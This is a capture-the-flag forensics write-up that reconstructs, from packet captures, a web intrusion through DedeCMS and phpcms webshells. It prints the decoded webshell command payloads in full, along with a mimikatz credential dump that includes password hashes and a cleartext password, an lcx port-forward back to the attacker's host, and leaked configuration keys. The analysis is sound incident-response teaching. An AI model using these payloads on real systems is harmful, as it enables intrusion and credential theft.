[Information Security Triathlon Finals] (Data Track) Problem 4




All problems: https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md


[Image 1]

Someone is running a directory scan.
From this we can fairly confidently identify a likely attacker and a victim.

Attacker: 172.16.10.110
Victim: 192.168.20.117

First, filter out all packets exchanged between the two.

PS:
Once the attacker and the victim have been identified, extracting every packet between them directly still seems the most reliable approach.

#!/bin/bash
# attack_dump.sh
# Extract every packet between the attacker and the victim from each
# capture into a same-named pcap under ./attack/

target_folder='attack'

mkdir -p "${target_folder}"

# Glob instead of parsing `ls`, and quote every expansion so odd filenames survive.
for file in *.pcap; do
   echo "Dumping attack packets in ${file}..."
   tcpdump -s 0 'host 172.16.10.110 or host 192.168.20.117' -r "${file}" -w "${target_folder}/${file}"
   echo "${file} Done!"
done

An HTTP-only text dump (http.txt) was produced at the same time.
Grepping the HTTP text directly still feels like the faster route.

First, grep straight away to see whether there is a small webshell (小马) or similar:

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

But this one turns out to be a plain text file?

[Image 2]

Scrolling up and down from there, a webshell does turn up.

[Image 3]

This webshell seems to have some distinctive traits,
for example:

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

Search on those traits:

grep -n -C 5 'spider.html' http.txt | grep 'POST '

Sure enough, two webshells turn up:

/9.php
/uploadfile/2017/0905/20170905055411283.php

Presumably both shells were written to the server through some vulnerability.
Search directly for the first place 9.php appears.

[Image 4]

[Image 5]

Searching for /admin/file_manage_control.php
shows that the target runs DedeCMS (织梦CMS).
The vulnerability exploited is presumably the one described here:

http://www.cnblogs.com/LittleHann/p/4237578.html

It can be seen that the attacker first used the above vulnerability to write 9.php to the server.

[Image 6]

Searching for the other webshell, however, shows it being used straight away, with no write step,
and its filename is a timestamp,
so it was presumably uploaded to the server through a file-upload vulnerability.

Based on the packet details, the following article was found:

http://0day5.com/archives/4368/ (phpcms v9 front-end GetShell)
This exploit makes use of a file named 1.txt.

Tracing further back,

we find that the attacker wrote the file 1.txt through 9.php.

[Image 7]
[Image 8]

Going further back: to trigger the DedeCMS bug that writes 9.php, the attacker needed the administrator password,
so the password must have been brute-forced before that.

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c
[Image 9]

After searching, it turns out the attacker essentially already knew the back-end login password: there was no brute-forcing, just a direct login.


[Image 10]
gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

Username: admin
Password: 19901109

There are many possible explanations for the attacker knowing the password outright and logging in directly:
the administrator password may have been obtained through SQL injection,
through social engineering,
or through a sensitive-information leak, and so on.

On closer study, the password was probably not obtained through a visible (non-blind) injection,
because no other occurrence of the same string can be found anywhere in the capture.

I tried to check whether a blind injection was involved...
...perhaps due to my limited ability, I could not work it out...

Next, let's look at what the attacker did with the two webshells.
First, 9.php:

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'
grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get the system version, user name and other host information
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// Get the system version, user name and other host information

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command ipconfig
Windows IP Configuration.               
.                    
.                    
Ethernet adapter ........:.             
.                    
   Connection-specific DNS Suffix  . : .           
   IP Address. . . . . . . . . . . . : 192.168.20.117.
   Subnet Mask . . . . . . . . . . . : 255.255.255.0.
   Default Gateway . . . . . . . . . : 192.168.20.1.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command systeminfo
......:           WANGGUAN-C938A1
OS ....:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....:          5.2.3790 Service Pack 2 Build 3790
OS ......:        Microsoft Corporation
OS ....:          ..........
OS ........:      Uniprocessor Free
............:     wangguan
..........:               
.... ID:          91353-645-7659413-50864
............:     2017-8-29, 10:14:19
............:     0 .. 2 .... 55 .. 11 ..
..........:       VMware, Inc.
........:         VMware Virtual Platform
........:         x64-based PC
......:           ...... 1 ..........
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....:        UNKNOWN 
Windows ....:     C:\WINDOWS
........:         C:\WINDOWS\system32
........:         \Device\HarddiskVolume1
............:     zh-cn;....(....)
..............:   zh-cn;....(....)
....:             (GMT+08:00) ....................................
............:     1,023 MB
..............:   379 MB  
........: ......: 2,299 MB
........: ....:   1,854 MB
........: ......: 445 MB  
............:     C:\pagefile.sys
..:               WORKGROUP
..........:       \\WANGGUAN-C938A1
........:         ...... 1 ............
                  [       
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..        
n.P......5..QP...."..01]: Q147222
....:             ...... 1 .. NIC..
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ......:      ........
                      .... DHCP:   ..                                                                                          
                      DHCP ......: 192.168.20.1
                      IP ....
                      [01]: 192.168.20.117
[S]                       

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// Use mimikatz.exe to harvest system passwords and write them to C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// Read file contents: C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
Us                                                                                                                         
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..                                  
n.P...#U....8P....n..er Name         : Administrator                                                                          
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read file contents: C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command: C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan������ɨ��.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the system command C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");echo fwrite(fopen('C:\\phpStudy\\WWW\\1.txt','w'),$_POST['z1'])?'1':'0';;echo("X@Y");die();
// Write the file C:\\phpStudy\\WWW\\1.txt


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the C:\\phpStudy\\WWW\\ directory

Then the other webshell:

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64
http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/include/crons/ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/include/ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/include/ directory

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/ directory
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file /var/www/html/api.php
get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('

Bad Request!

'); } $op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty'); if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback'])) unset($_GET['callback']); if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) { include PHPCMS_PATH.'api/'.$op.'.php'; } else { exit('API handler does not exist'); } ?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// List all files in the /var/www/html/phpcms/ directory
model/  2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// Read the contents of the file /var/www/html/phpcms/base.php (the Chinese comments of this config were mangled to dots in the dump; one tcpdump packet header is interleaved in the middle)
'/', //Session....
'session_storage' => 'mysql',
'session_ttl' => 1800,
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,
//Cookie....
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
'tpl_root' => 'templates/',
'tpl_name' => 'default',
'tpl_css' => 'default',
'tpl_referesh' => 1,
'tpl_edit'=> 0,
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/',
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',
'charset' => 'gbk',
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0,
'admin_log' =>
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..
n..".-. 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL',
'lang' => 'zh-cn',
'lock_ex' => '1', //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1', //........phpsso
'phpsso_appid' => '1', //....id
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb',
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',
'safe_card'=>'1',
'connect_enable' => '1',
'sina_akey' => '', //sina AKEY
'sina_skey' => '', //sina SKEY
'snda_akey' => '', //.......... akey
'snda_skey' => '', //.......... skey
'qq_akey' => '', //qq skey
'qq_skey' => '', //qq skey
'qq_appkey' => '', //QQ........ appkey
'qq_appid' => '', //QQ........ appid
'qq_callback' => '', //QQ........ callback
'admin_url' => '',
);
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// Run the command whoami
www-data

